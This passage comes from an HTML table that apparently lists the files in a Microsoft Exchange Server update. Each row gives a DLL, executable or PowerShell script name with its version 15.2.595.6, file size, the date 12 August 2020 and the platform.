td><td>15.2.595.6</td><td>13,176</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.textprocessing.dll</td><td>15.2.595.6</td><td>221,568</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.textprocessing.eventlog.dll</td><td>15.2.595.6</td><td>13,696</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.agent.addressbookpolicyroutingagent.dll</td><td>15.2.595.6</td><td>29,056</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.antispam.common.dll</td><td>15.2.595.6</td><td>138,632</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.contentfilter.cominterop.dll</td><td>15.2.595.6</td><td>21,896</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.controlflow.dll</td><td>15.2.595.6</td><td>40,312</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.faultinjectionagent.dll</td><td>15.2.595.6</td><td>22,920</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.frontendproxyagent.dll</td><td>15.2.595.6</td><td>21,376</td><td>12-Aug-2020</td><td>20:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.hygiene.dll</td><td>15.2.595.6</td><td>212,360</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.interceptoragent.dll</td><td>15.2.595.6</td><td>98,696</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.liveidauth.dll</td><td>15.2.595.6</td><td>22,920</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.malware.dll</td><td>15.2.595.6</td><td>169,352</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.malware.eventlog.dll</td><td>15.2.595.6</td><td>18,304</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.agent.phishingdetection.dll</td><td>15.2.595.6</td><td>20,872</td><td>12-Aug-2020</td><td>20:44</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.prioritization.dll</td><td>15.2.595.6</td><td>31,616</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.protocolanalysis.dbaccess.dll</td><td>15.2.595.6</td><td>46,976</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.search.dll</td><td>15.2.595.6</td><td>30,088</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.senderid.core.dll</td><td>15.2.595.6</td><td>53,128</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.sharedmailboxsentitemsroutingagent.dll</td><td>15.2.595.6</td><td>44,936</td><td>12-Aug-2020</td><td>20:44</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.systemprobedrop.dll</td><td>15.2.595.6</td><td>18,312</td><td>12-Aug-2020</td><td>20:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.transportfeatureoverrideagent.dll</td><td>15.2.595.6</td><td>46,464</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.trustedmailagents.dll</td><td>15.2.595.6</td><td>46,464</td><td>12-Aug-2020</td><td>20:43</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.cloudmonitor.common.dll</td><td>15.2.595.6</td><td>28,040</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.common.dll</td><td>15.2.595.6</td><td>457,088</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.contracts.dll</td><td>15.2.595.6</td><td>18,304</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.decisionengine.dll</td><td>15.2.595.6</td><td>30,592</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.dll</td><td>15.2.595.6</td><td>4,183,936</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.dsapiclient.dll</td><td>15.2.595.6</td><td>182,144</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.eventlog.dll</td><td>15.2.595.6</td><td>121,736</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.extensibility.dll</td><td>15.2.595.6</td><td>403,840</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.extensibilityeventlog.dll</td><td>15.2.595.6</td><td>14,728</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.flighting.dll</td><td>15.2.595.6</td><td>89,984</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.logging.dll</td><td>15.2.595.6</td><td>88,960</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.logging.search.dll</td><td>15.2.595.6</td><td>68,488</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.loggingcommon.dll</td><td>15.2.595.6</td><td>63,368</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.monitoring.dll</td><td>15.2.595.6</td><td>430,472</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.net.dll</td><td>15.2.595.6</td><td>122,240</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.protocols.contracts.dll</td><td>15.2.595.6</td><td>17,792</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.protocols.dll</td><td>15.2.595.6</td><td>29,064</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.protocols.httpsubmission.dll</td><td>15.2.595.6</td><td>60,800</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.requestbroker.dll</td><td>15.2.595.6</td><td>50,056</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.scheduler.contracts.dll</td><td>15.2.595.6</td><td>33,144</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.scheduler.dll</td><td>15.2.595.6</td><td>113,032</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.smtpshared.dll</td><td>15.2.595.6</td><td>18,312</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.storage.contracts.dll</td><td>15.2.595.6</td><td>52,088</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.storage.dll</td><td>15.2.595.6</td><td>675,208</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.storage.management.dll</td><td>15.2.595.6</td><td>23,944</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.agents.dll</td><td>15.2.595.6</td><td>17,792</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.common.dll</td><td>15.2.595.6</td><td>487,296</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.common.eventlog.dll</td><td>15.2.595.6</td><td>12,680</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.sync.manager.dll</td><td>15.2.595.6</td><td>306,048</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.manager.eventlog.dll</td><td>15.2.595.6</td><td>15,744</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.sync.migrationrpc.dll</td><td>15.2.595.6</td><td>46,464</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.worker.dll</td><td>15.2.595.6</td><td>1,044,360</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.worker.eventlog.dll</td><td>15.2.595.6</td><td>15,240</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.transportlogsearch.eventlog.dll</td><td>15.2.595.6</td><td>18,816</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.transportsyncmanagersvc.exe</td><td>15.2.595.6</td><td>18,824</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.troubleshootingtool.shared.dll</td><td>15.2.595.6</td><td>118,656</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.umcommon.dll</td><td>15.2.595.6</td><td>924,552</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.umcore.dll</td><td>15.2.595.6</td><td>1,466,248</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.umvariantconfiguration.dll</td><td>15.2.595.6</td><td>32,648</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.unifiedcontent.dll</td><td>15.2.595.6</td><td>41,856</td><td>12-Aug-2020</td><td>20:43</td><td>x86</td></tr><tr><td>Microsoft.exchange.unifiedcontent.exchange.dll</td><td>15.2.595.6</td><td>24,960</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.unifiedpolicyfilesync.eventlog.dll</td><td>15.2.595.6</td><td>15,232</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.unifiedpolicyfilesyncservicelet.dll</td><td>15.2.595.6</td><td>83,328</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.unifiedpolicysyncservicelet.dll</td><td>15.2.595.6</td><td>50,048</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.antispam.dll</td><td>15.2.595.6</td><td>642,440</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.core.dll</td><td>15.2.595.6</td><td>186,232</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.dll</td><td>15.2.595.6</td><td>67,464</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.eventlog.dll</td><td>15.2.595.6</td><td>12,672</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Microsoft.exchange.variantconfiguration.excore.dll</td><td>15.2.595.6</td><td>56,704</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.globalsettings.dll</td><td>15.2.595.6</td><td>27,528</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.hygiene.dll</td><td>15.2.595.6</td><td>120,712</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.protectionservice.dll</td><td>15.2.595.6</td><td>31,624</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.threatintel.dll</td><td>15.2.595.6</td><td>57,224</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.webservices.auth.dll</td><td>15.2.595.6</td><td>35,712</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.webservices.dll</td><td>15.2.595.6</td><td>1,054,080</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.webservices.xrm.dll</td><td>15.2.595.6</td><td>67,976</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.wlmservicelet.dll</td><td>15.2.595.6</td><td>23,424</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.wopiclient.dll</td><td>15.2.595.6</td><td>77,192</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.workingset.signalapi.dll</td><td>15.2.595.6</td><td>17,288</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.workingsetabstraction.signalapiabstraction.dll</td><td>15.2.595.6</td><td>29,064</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.workloadmanagement.dll</td><td>15.2.595.6</td><td>505,216</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.workloadmanagement.eventlogs.dll</td><td>15.2.595.6</td><td>14,720</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.workloadmanagement.throttling.configuration.dll</td><td>15.2.595.6</td><td>36,744</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.workloadmanagement.throttling.dll</td><td>15.2.595.6</td><td>66,432</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.fast.contextlogger.json.dll</td><td>15.2.595.6</td><td>19,328</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.filtering.dll</td><td>15.2.595.6</td><td>113,016</td><td>12-Aug-2020</td><td>20:43</td><td>x86</td></tr><tr><td>Microsoft.filtering.exchange.dll</td><td>15.2.595.6</td><td>57,224</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.filtering.interop.dll</td><td>15.2.595.6</td><td>15,232</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.forefront.activedirectoryconnector.dll</td><td>15.2.595.6</td><td>46,984</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.forefront.activedirectoryconnector.eventlog.dll</td><td>15.2.595.6</td><td>15,744</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Microsoft.forefront.filtering.common.dll</td><td>15.2.595.6</td><td>23,936</td><td>12-Aug-2020</td><td>20:43</td><td>x86</td></tr><tr><td>Microsoft.forefront.filtering.diagnostics.dll</td><td>15.2.595.6</td><td>22,400</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.forefront.filtering.eventpublisher.dll</td><td>15.2.595.6</td><td>34,688</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.forefront.management.powershell.format.ps1xml</td><td>Not applicable</td><td>48,902</td><td>12-Aug-2020</td><td>20:45</td><td>Not applicable</td></tr><tr><td>Microsoft.forefront.management.powershell.types.ps1xml</td><td>Not applicable</td><td>16,278</td><td>12-Aug-2020</td><td>20:45</td><td>Not applicable</td></tr><tr><td>Microsoft.forefront.monitoring.activemonitoring.local.components.dll</td><td>15.2.595.6</td><td>1,517,960</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.forefront.monitoring.activemonitoring.local.components.messages.dll</td><td>15.2.595.6</td><td>13,192</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.forefront.monitoring.management.outsidein.dll</td><td>15.2.595.6</td><td>33,144</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.forefront.recoveryactionarbiter.contract.dll</td><td>15.2.595.6</td><td>18,304</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.forefront.reporting.common.dll</td><td>15.2.595.6</td><td>46,472</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.forefront.reporting.ondemandquery.dll</td><td>15.2.595.6</td><td>50,568</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.isam.esent.collections.dll</td><td>15.2.595.6</td><td>72,576</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.isam.esent.interop.dll</td><td>15.2.595.6</td><td>541,576</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.managementgui.dll</td><td>15.2.595.6</td><td>133,504</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.mce.interop.dll</td><td>15.2.595.6</td><td>24,448</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.office.audit.dll</td><td>15.2.595.6</td><td>124,792</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.office.client.discovery.unifiedexport.dll</td><td>15.2.595.6</td><td>593,288</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.office.common.ipcommonlogger.dll</td><td>15.2.595.6</td><td>42,368</td><td>12-Aug-2020</td><td>20:43</td><td>x86</td></tr><tr><td>Microsoft.office.compliance.console.core.dll</td><td>15.2.595.6</td><td>217,984</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.office.compliance.console.dll</td><td>15.2.595.6</td><td>854,912</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.office.compliance.console.extensions.dll</td><td>15.2.595.6</td><td>485,760</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.office.compliance.core.dll</td><td>15.2.595.6</td><td>413,056</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.office.compliance.ingestion.dll</td><td>15.2.595.6</td><td>36,224</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.office.compliancepolicy.exchange.dar.dll</td><td>15.2.595.6</td><td>84,872</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.office.compliancepolicy.platform.dll</td><td>15.2.595.6</td><td>1,782,152</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.office.datacenter.activemonitoring.management.common.dll</td><td>15.2.595.6</td><td>49,536</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.office.datacenter.activemonitoring.management.dll</td><td>15.2.595.6</td><td>27,528</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.office.datacenter.activemonitoringlocal.dll</td><td>15.2.595.6</td><td>174,968</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.office.datacenter.monitoring.activemonitoring.recovery.dll</td><td>15.2.595.6</td><td>166,272</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.office365.datainsights.uploader.dll</td><td>15.2.595.6</td><td>40,320</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.online.box.shell.dll</td><td>15.2.595.6</td><td>46,464</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.powershell.hostingtools.dll</td><td>15.2.595.6</td><td>67,968</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.powershell.hostingtools_2.dll</td><td>15.2.595.6</td><td>67,968</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.tailoredexperiences.core.dll</td><td>15.2.595.6</td><td>120,192</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Migrateumcustomprompts.ps1</td><td>Not applicable</td><td>19,110</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Modernpublicfoldertomailboxmapgenerator.ps1</td><td>Not applicable</td><td>29,052</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Movemailbox.ps1</td><td>Not applicable</td><td>61,116</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Movetransportdatabase.ps1</td><td>Not applicable</td><td>30,590</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Move_publicfolderbranch.ps1</td><td>Not applicable</td><td>17,520</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Mpgearparser.dll</td><td>15.2.595.6</td><td>99,712</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Msclassificationadapter.dll</td><td>15.2.595.6</td><td>248,704</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Msexchangecompliance.exe</td><td>15.2.595.6</td><td>78,728</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Msexchangedagmgmt.exe</td><td>15.2.595.6</td><td>25,464</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Msexchangedelivery.exe</td><td>15.2.595.6</td><td>38,792</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Msexchangefrontendtransport.exe</td><td>15.2.595.6</td><td>31,624</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Msexchangehmhost.exe</td><td>15.2.595.6</td><td>27,016</td><td>12-Aug-2020</td><td>20:43</td><td>x86</td></tr><tr><td>Msexchangehmrecovery.exe</td><td>15.2.595.6</td><td>29,568</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Msexchangemailboxassistants.exe</td><td>15.2.595.6</td><td>72,584</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Msexchangemailboxreplication.exe</td><td>15.2.595.6</td><td>20,872</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Msexchangemigrationworkflow.exe</td><td>15.2.595.6</td><td>68,992</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Msexchangerepl.exe</td><td>15.2.595.6</td><td>71,040</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Msexchangesubmission.exe</td><td>15.2.595.6</td><td>123,264</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Msexchangethrottling.exe</td><td>15.2.595.6</td><td>39,816</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Msexchangetransport.exe</td><td>15.2.595.6</td><td>74,120</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Msexchangetransportlogsearch.exe</td><td>15.2.595.6</td><td>139,136</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Msexchangewatchdog.exe</td><td>15.2.595.6</td><td>55,680</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Mspatchlinterop.dll</td><td>15.2.595.6</td><td>53,632</td><td>12-Aug-2020</td><td>20:45</td><td>x64</td></tr><tr><td>Nativehttpproxy.dll</td><td>15.2.595.6</td><td>91,520</td><td>12-Aug-2020</td><td>20:47</td><td>x64</td></tr><tr><td>Navigatorparser.dll</td><td>15.2.595.6</td><td>636,800</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Nego2nativeinterface.dll</td><td>15.2.595.6</td><td>19,336</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Negotiateclientcertificatemodule.dll</td><td>15.2.595.6</td><td>30,080</td><td>12-Aug-2020</td><td>20:43</td><td>x64</td></tr><tr><td>Newtestcasconnectivityuser.ps1</td><td>Not applicable</td><td>19,752</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Newtestcasconnectivityuserhosting.ps1</td><td>Not applicable</td><td>24,567</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Ntspxgen.dll</td><td>15.2.595.6</td><td>80,768</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Oleconverter.exe</td><td>15.2.595.6</td><td>173,952</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Outsideinmodule.dll</td><td>15.2.595.6</td><td>87,944</td><td>12-Aug-2020</td><td>20:43</td><td>x64</td></tr><tr><td>Owaauth.dll</td><td>15.2.595.6</td><td>92,032</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Perf_common_extrace.dll</td><td>15.2.595.6</td><td>245,120</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Perf_exchmem.dll</td><td>15.2.595.6</td><td>86,400</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Pipeline2.dll</td><td>15.2.595.6</td><td>1,454,472</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Preparemoverequesthosting.ps1</td><td>Not applicable</td><td>70,983</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Prepare_moverequest.ps1</td><td>Not applicable</td><td>73,217</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Productinfo.managed.dll</td><td>15.2.595.6</td><td>27,008</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Proxybinclientsstringsdll</td><td>15.2.595.6</td><td>924,544</td><td>12-Aug-2020</td><td>20:43</td><td>x86</td></tr><tr><td>Publicfoldertomailboxmapgenerator.ps1</td><td>Not applicable</td><td>23,226</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Quietexe.exe</td><td>15.2.595.6</td><td>14,720</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Redistributeactivedatabases.ps1</td><td>Not applicable</td><td>250,572</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Reinstalldefaulttransportagents.ps1</td><td>Not applicable</td><td>21,659</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Remoteexchange.ps1</td><td>Not applicable</td><td>23,577</td><td>12-Aug-2020</td><td>20:46</td><td>Not applicable</td></tr><tr><td>Removeuserfrompfrecursive.ps1</td><td>Not applicable</td><td>14,672</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Replaceuserpermissiononpfrecursive.ps1</td><td>Not applicable</td><td>14,990</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Replaceuserwithuseronpfrecursive.ps1</td><td>Not applicable</td><td>15,000</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Replaycrimsonmsg.dll</td><td>15.2.595.6</td><td>1,104,768</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Resetattachmentfilterentry.ps1</td><td>Not applicable</td><td>15,464</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Resetcasservice.ps1</td><td>Not applicable</td><td>21,695</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Reset_antispamupdates.ps1</td><td>Not applicable</td><td>14,089</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Restoreserveronprereqfailure.ps1</td><td>Not applicable</td><td>15,129</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Resumemailboxdatabasecopy.ps1</td><td>Not applicable</td><td>17,214</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Rightsmanagementwrapper.dll</td><td>15.2.595.6</td><td>86,408</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Rollalternateserviceaccountpassword.ps1</td><td>Not applicable</td><td>55,778</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Rpcperf.dll</td><td>15.2.595.6</td><td>23,424</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Rpcproxyshim.dll</td><td>15.2.595.6</td><td>39,296</td><td>12-Aug-2020</td><td>20:47</td><td>x64</td></tr><tr><td>Rulesauditmsg.dll</td><td>15.2.595.6</td><td>12,672</td><td>12-Aug-2020</td><td>20:45</td><td>x64</td></tr><tr><td>Safehtmlnativewrapper.dll</td><td>15.2.595.6</td><td>34,696</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Scanenginetest.exe</td><td>15.2.595.6</td><td>956,296</td><td>12-Aug-2020</td><td>20:43</td><td>x64</td></tr><tr><td>Scanningprocess.exe</td><td>15.2.595.6</td><td>739,200</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Searchdiagnosticinfo.ps1</td><td>Not applicable</td><td>16,800</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Servicecontrol.ps1</td><td>Not applicable</td><td>52,317</td><td>12-Aug-2020</td><td>20:41</td><td>Not 